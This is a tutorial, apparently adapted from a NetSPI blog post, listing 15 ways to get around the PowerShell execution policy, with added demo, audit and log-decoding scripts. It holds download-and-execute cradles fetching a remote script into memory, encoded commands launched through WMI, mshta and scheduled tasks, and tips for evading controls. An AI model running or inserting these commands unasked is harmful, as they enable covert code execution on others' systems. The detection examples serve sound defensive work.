Bypass the PowerShell Execution Policy
💻 15 Ways to Bypass the PowerShell Execution Policy
Author: Based on the original by Scott Sutherland (summarized & adapted). Original: NetSPI Blog.
🧠 Introduction
PowerShell's execution policy restricts script execution. It is designed to prevent accidental or unauthorized script runs, not to act as a security boundary, and there are many legitimate reasons to work around it, especially during penetration testing, red team exercises, or automation. Below are 15 common methods to bypass the policy; most of them need no admin rights.
🔐 Bypass Techniques Explained (with examples)
1. Paste the script directly in the console
The execution policy only applies to script files. Code that is typed or pasted directly into the console is treated as interactive commands and bypasses policy restrictions entirely.
2. Echo and pipe to PowerShell
You can echo the script and pipe it to PowerShell's standard input:
echo Write-Host "Hello" | powershell -noprofile -
This executes the text via stdin and avoids saving the script to disk.
3. Read a script file and pipe it to PowerShell
This loads a script from disk and pipes it in:
Get-Content script.ps1 | powershell -noprofile -
The file is read line-by-line and fed in as input, so the execution policy is not enforced even though the script still exists on disk.
4. Download and execute in memory
Common in red teaming, this downloads the script and executes it directly:
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://example.com/script.ps1')"
Nothing is written to disk; the downloaded text is evaluated as a command.
5. Use the -Command argument
Code passed via the `-command` flag is evaluated like pasted input, not like a script file:
powershell -command "Write-Host 'Bypassed!'"
Executes inline commands.
6. Use the -EncodedCommand argument
Scripts can be Base64-encoded (the bytes must be UTF-16LE, i.e. `Unicode`) and passed directly to PowerShell:
$command = "Write-Host 'Hello'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded
Useful for obfuscation and policy bypass, since the decoded text is treated as a command rather than a script file.
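The following is an added example, not from the NetSPI post or the adaptation above, that demonstrates items 1 to 6 in one session: it tightens the policy for the current process only, writes a constructed sample script to a temp file, and shows that invoking the file is blocked while the same text runs through the pipeline, stdin, `-Command` and `-EncodedCommand`. It assumes Windows PowerShell 5.1 (`powershell.exe`) and that no Group Policy overrides the Process scope; the function name `Test-ExecutionPolicyGaps` is mine, not a built-in.

```powershell
# Added example: the execution policy gates script *files*, not commands.
# Assumes Windows PowerShell 5.1 (powershell.exe) and no Group Policy override
# of the Process scope. Function name is illustrative, not a built-in.
function Test-ExecutionPolicyGaps {
    $ErrorActionPreference = 'Stop'

    # Restrict this process only. Child powershell.exe processes inherit the
    # setting through the $env:PSExecutionPolicyPreference variable.
    Set-ExecutionPolicy -ExecutionPolicy Restricted -Scope Process -Force

    # Constructed sample script; the same text is used by every method below.
    $body   = "Write-Output 'hello from the script body'"
    $script = Join-Path $env:TEMP 'policy-demo.ps1'
    Set-Content -Path $script -Value $body

    $results = [ordered]@{}
    try {
        # Baseline: invoking the .ps1 as a file is blocked under Restricted.
        $results['file'] = & $script
    } catch {
        $results['file'] = 'BLOCKED: ' + $_.Exception.GetType().Name
    }

    # Methods 1 and 9: the file contents as text, evaluated like pasted input.
    $results['iex'] = Get-Content -Raw $script | Invoke-Expression

    # Methods 2 and 3: contents fed to a child process on stdin ("-").
    $results['stdin'] = Get-Content $script | powershell -NoProfile -

    # Method 5: -Command evaluates the text as commands.
    $results['command'] = powershell -NoProfile -Command $body

    # Method 6: -EncodedCommand takes Base64 of the UTF-16LE text.
    $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($body))
    $results['encoded'] = powershell -NoProfile -EncodedCommand $b64

    Remove-Item $script -Force
    # Only 'file' is blocked; every other entry holds the script's output.
    return $results
}

Test-ExecutionPolicyGaps | Format-Table -AutoSize
```

If Group Policy enforces a policy, the `Set-ExecutionPolicy -Scope Process` call reports that it is overridden and the baseline case is blocked by the policy scope instead, but the other four entries still run, which is the whole point of items 1 to 6.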
7. Set the policy for the session, via Set-ExecutionPolicy, Group Policy or the registry
If you have access, change the execution policy for the current session only (no admin rights needed):
Set-ExecutionPolicy Bypass -Scope Process
This affects only the current process. Alternatively, modify the `ExecutionPolicy` value under `HKLM:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell` (LocalMachine scope, requires admin) or the same path under `HKCU:` (CurrentUser scope). Note that the Group Policy scopes (MachinePolicy and UserPolicy) take precedence over all of these, so where the policy is enforced by GPO, the command-based techniques above remain the way in.
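An added check, not from the original post, that is worth running before relying on method 7: it reports every scope in precedence order, the registry or environment location each one reads, and whether Group Policy is enforcing a value that `Set-ExecutionPolicy` cannot override. The registry paths are the documented ones for Windows PowerShell 5.1; the function name `Get-ExecutionPolicySource` is mine.

```powershell
# Added example: where each execution-policy scope is stored, highest precedence first.
# Assumes Windows PowerShell 5.1. Registry locations are the documented ones;
# the function name is illustrative.
function Get-ExecutionPolicySource {
    $scopes = @(
        @{ Scope = 'MachinePolicy'; Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'; Name = 'ExecutionPolicy' }
        @{ Scope = 'UserPolicy';    Key = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'; Name = 'ExecutionPolicy' }
        @{ Scope = 'Process';       Key = 'env:';                                                  Name = 'PSExecutionPolicyPreference' }
        @{ Scope = 'CurrentUser';   Key = 'HKCU:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'; Name = 'ExecutionPolicy' }
        @{ Scope = 'LocalMachine';  Key = 'HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'; Name = 'ExecutionPolicy' }
    )
    foreach ($s in $scopes) {
        $stored = $null
        if ($s.Key -eq 'env:') {
            # The Process scope lives in an environment variable, not the registry.
            $stored = [Environment]::GetEnvironmentVariable($s.Name)
        } elseif (Test-Path $s.Key) {
            # A GPO set to "Disabled" stores EnableScripts=0 and may omit ExecutionPolicy;
            # the Effective column (Get-ExecutionPolicy) covers that case.
            $stored = (Get-ItemProperty -Path $s.Key -Name $s.Name -ErrorAction SilentlyContinue).($s.Name)
        }
        [pscustomobject]@{
            Scope     = $s.Scope
            Effective = Get-ExecutionPolicy -Scope $s.Scope
            Stored    = $stored
            Source    = "$($s.Key)\$($s.Name)"
        }
    }
}

$report = Get-ExecutionPolicySource
$report | Format-Table -AutoSize

# If either *Policy scope is defined, Set-ExecutionPolicy cannot change the effective policy.
if ($report | Where-Object { $_.Scope -like '*Policy' -and $_.Effective -ne 'Undefined' }) {
    Write-Warning 'Group Policy is enforcing the execution policy; only command-based techniques apply.'
}
```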
8. Use PowerShell ISE (Integrated Scripting Environment)
ISE does not apply the policy to text run from its editor. Open the script in ISE and run the selected text (Run Selection), which executes it as typed commands rather than as a script file:
powershell_ise.exe script.ps1
Running a saved file with Run Script (F5) invokes it as a script file and is still subject to the policy.
9. Change the file extension
Rename `script.ps1` to `script.txt`, then read the file into memory and run its contents manually, for example from another script. The policy is only enforced on `.ps1` files, so reading and evaluating the text avoids it (and may avoid controls that only look for `.ps1` files).
10. Use WMI to launch PowerShell
PowerShell can be started, locally or remotely, through the WMI `Win32_Process` class. Combined with `-enc`, no script file is involved, so the policy does not apply:
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell -nop -enc ..."
11. Scheduled task
Create a scheduled task to run your script, for example under another account or at a chosen time. The task itself changes nothing about the policy: the spawned powershell.exe still reads the machine and user settings, so the command line must carry its own bypass (here `-ExecutionPolicy Bypass`):
schtasks /create /tn bypass /tr "powershell.exe -ExecutionPolicy Bypass -File script.ps1" /sc once /st 00:00
12. PowerShell remoting (WinRM)
Executes on remote systems. A script block sent with Invoke-Command is treated as commands by the remote session, so the remote execution policy does not block it (it still applies to script files invoked on the target):
Invoke-Command -ScriptBlock {Write-Host "Hello"} -ComputerName target
13. Inject via DLL injection or reflective PE loading (advanced)
Advanced method: load the PowerShell engine (System.Management.Automation) directly into a process's memory via a custom DLL or PE loader, so neither powershell.exe nor a script file is involved. Used by tools like PowerShell Empire.
14. Use alternate script hosts (e.g., MSHTA, wscript)
Launch PowerShell indirectly from other interpreters, for example via MSHTA:
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -nop -enc ..."":close")
The alternate host triggers PowerShell with a command-line payload, so no script file is involved.
15. Use trusted software that executes PowerShell
Some applications such as MSBuild, Excel macros, or installer frameworks invoke PowerShell under the hood; hijack or abuse them to run your code.
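Because methods 6, 10 and 14 all surface in process-creation telemetry as an `-enc` argument, here is an added detection-side example, not from the original post, that pulls the Base64 out of a logged command line, including the abbreviated forms `-e` and `-ec` and commands wrapped by mshta or WMI, and decodes the UTF-16LE text. The sample command lines are constructed in the block itself; the function name `ConvertFrom-EncodedCommandLine` is mine.

```powershell
# Added example: decode -EncodedCommand payloads from logged command lines
# (e.g. Sysmon event 1 or Security 4688 CommandLine fields). Function name is illustrative.
function ConvertFrom-EncodedCommandLine {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$CommandLine)
    process {
        # powershell.exe accepts -e, -ec and every prefix of -EncodedCommand, with - or / as the switch char.
        $aliases = @('ec') + (1..14 | ForEach-Object { 'encodedcommand'.Substring(0, $_) })
        $pattern = '(?i)(?:^|\s)[-/](' + ($aliases -join '|') + ')\s+["'']?([A-Za-z0-9+/]+=*)'
        $m = [regex]::Match($CommandLine, $pattern)
        if (-not $m.Success) { return }

        $b64 = $m.Groups[2].Value
        # Restore padding that some log pipelines strip.
        if ($b64.Length % 4) { $b64 += '=' * (4 - $b64.Length % 4) }
        try {
            $bytes = [Convert]::FromBase64String($b64)
        } catch {
            Write-Warning "Not valid Base64: $b64"
            return
        }
        [pscustomobject]@{
            Switch      = '-' + $m.Groups[1].Value
            Decoded     = [Text.Encoding]::Unicode.GetString($bytes)   # -enc is always UTF-16LE
            CommandLine = $CommandLine
        }
    }
}

# Constructed samples: the payload is encoded here so the demo is self-contained and offline.
$payload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.com/script.ps1')"))
$samples = @(
    "powershell -nop -w hidden -enc $payload",
    "powershell.exe -e $payload",
    "mshta vbscript:Execute(""CreateObject(""""Wscript.Shell"""").Run """"powershell -nop -ec $payload"""":close"")",
    "wmic process call create ""powershell -NoProfile -EncodedCommand $payload""",
    "powershell -File C:\scripts\build.ps1"   # no encoded payload, so no output for this one
)
$samples | ConvertFrom-EncodedCommandLine | Format-List
```

The first four samples decode to the same download cradle; the fifth produces nothing. Pair this with Script Block Logging (event 4104), which records the decoded text anyway once the engine runs it, so that a bypass of the execution policy is still visible on the host.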
⚠️ Legal Notice
These methods are intended for legitimate use only, such as authorized security assessments, research, automation, and red teaming. Use them responsibly and within the bounds of local laws and organizational policy.
Adapted from the NetSPI post: https://www.netspi.com/...